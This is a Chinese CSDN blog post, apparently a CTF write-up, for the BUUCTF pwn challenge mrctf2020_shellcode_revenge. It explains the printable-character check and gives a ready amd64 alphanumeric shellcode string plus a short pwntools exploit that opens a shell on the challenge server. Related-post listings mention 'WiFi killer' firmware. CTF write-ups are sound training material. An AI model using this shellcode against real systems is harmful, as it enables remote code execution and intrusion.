[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)

最新推荐文章于 2023-05-11 09:23:11 发布
最新推荐文章于 2023-05-11 09:23:11 发布
阅读量1.1k 收藏 2
点赞数 2
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115307573
版权

[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)

检查了下保护发现NX 没有开,肯定要自己写shellcode呀。
不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。

看下IDA, 不能反汇编不过问题不大,没事.
个人建议,看汇编的时候,建议看流程图,更加直观

将shellcode写入,那个buf
不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转跳

在这里插入图片描述
箭头的地方我们不希望发送转跳,这样我们就可以直接call rax了.rax指向的就是我们的buf.
但是eax为0, rbp + var_8是我们输入字符串的长度.肯定发送转跳

在这里插入图片描述

幸好接下来, 可以再次转跳回来,不过要求就是每个字符的ascii码 ,必须大于0x60, 小于0x7a或者一堆, 自己可以慢慢看.
总结就是可见字符可以重新转跳,并且eax会+ 1, 当所有的shellcode为可见字符时, 上面就不会发生转跳我们就可以执行call rax.
也就是我们的shellcode了

peak小知识

  1. 函数返回值,一般都会放在eax寄存器里面.
  2. amd64, linux可见字符shellcode 为'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

exploit

from pwn import *
p = remote("node3.buuoj.cn",28153)
payload = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
p.send(payload)
p.interactive()
Y-peak
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellcode转换字符串
07-18
shellcode转换字符串
171115 杂项-可见字符组成的Shellcode
whklhhhh的博客
11-22 1761
1625-5 王子昂 总结《2017年11月15日》 【连续第411天总结】 A. JarvisOJ-Basic-Shellcode B. 题目如下: 下载下来打开以后发现是一段正常字符串: PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYIhkmKzyCDq4l4FQyBlrRWEahI1tLKT16Pnk1ftLnkP
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5078
ascii shellcode : 自动生成shellcode,手写shellcode
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3552
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
mrctf2020_shellcode_revenge
K1ose的博客
04-24 739
下载附件,checksec一下; 存在可读可写可执行的段; 看一下IDA pro的汇编; 和先前的题目类似,先read也给0x400bytes的字符串,然后compare一下eax和0; jg表示jump if greater,如果eax>0则跳转,否则eax为0,跳到另一个地址; 接下来看到很多判断语句,截取其中一部分进行分析; 这里比较al和`的大小,jle表示jump if less or equal,即小于等于; 如果al<=60h,则跳转到11DA,如果al<=7Ah,则跳
mrctf2020_shellcode_revenge(不用仔细分析汇编)
CsCN_的博客
07-10 362
日常拖进IDA一看,发现不能反编译,原因是0x124D位置有个call rax 然后看了一下汇编,发现又臭又长,由于本人还没有学汇编,有些地方看不懂 所以我干脆直接在IDA里面改汇编,把call rax改成call main就能反编译了 一目了然 稍加分析便能发现输入字符必须要在(47,122]里,也就是从0到z 图源:百度百科,侵删 后面的问题就变成怎样把用这些字符写出shellcode了 看了一些大佬们用alpha3重定向一下就能搞出shellcode,详见大.
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 362
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了 #include<stdio.h> int .
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mrctf2020_shellcode
个人笔记
04-19 203
RELRO: Full RELRO完全没起作用,直接构造shellcode输入即可。
[BUUCTF]PWN——mrctf2020_shellcode
mcmuyanga的博客
01-08 1263
mrctf2020_shellcode 附件 步骤: 例行检查,64位程序,开启了relro和pie,没有nx,肯定是用shellcode最方便了 本地试运行一下,看看大概的情况 64位ida载入,根据运行时看到的字符串,迅速定位到关键程序,但是没法f5成伪代码,直接看汇编 栈大小是0x410,读入了0x400,无法造成溢出覆盖返回地址 不过好像这边分析了用处也不大,直接利用pwntools生成shellcode发送即可 shellcode=asm(shellcraft.sh()) exp fr
BUUCTF pwn——mrctf2020_shellcode
CNS-Enterprise BCC-1701-J
05-11 178
BUUCTF 做题练习
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值